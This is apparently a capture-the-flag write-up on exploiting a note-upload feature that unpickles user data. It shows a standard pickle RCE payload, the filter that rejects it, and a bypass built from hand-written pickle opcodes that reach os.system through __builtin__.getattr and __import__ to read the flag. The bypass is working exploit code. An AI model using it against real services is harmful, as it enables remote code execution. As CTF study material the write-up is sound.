Load_note allows to upload a pickle, if we throw at it the basic exploit:
```py thon
import pickle
import base64

class PickleRce(object):
def __reduce__(self):
import os
return (os.system,("cat flag.txt",))

payload = pickle.dumps(PickleRce())
print(base64.b64encode(payload))
```
it answers with:
```
pickle.UnpicklingError: Your pickle is trying to load something sneaky. Only the modules __main__, __builtin__ and copyreg are allowed. eval and exec are not allowed. 'posix.system' is forbidden
```
Since we wanted RCE we found a way to call `os.system` using only `__builtin__`:
```python
__builtin__.getattr(__builtin__.__import__("os"), "system")("cat flag.txt")
```
Now we can just traduce this to Pickle, since Pickle it's an actual interpreted language (for more info look [here](https://hackmd.io/@2KUYNtTcQ7WRyTsBT7oePg/BycZwjKNX?print-pdf#/)):
```
b"c__builtin__\ngetattr\nc__builtin__\n__import__\nS'os'\n\x85RS'system'\n\x86RS'%s'\n\x85R."%command
```

So the final exploit looks like:
```python
import pickle
import base64

print(base64.b64encode( b"c__builtin__\ngetattr\nc__builtin__\n__import__\nS'os'\n\x85RS'system'\n\x86RS'%s'\n\x85R."%b"""cat flag.txt"""))
```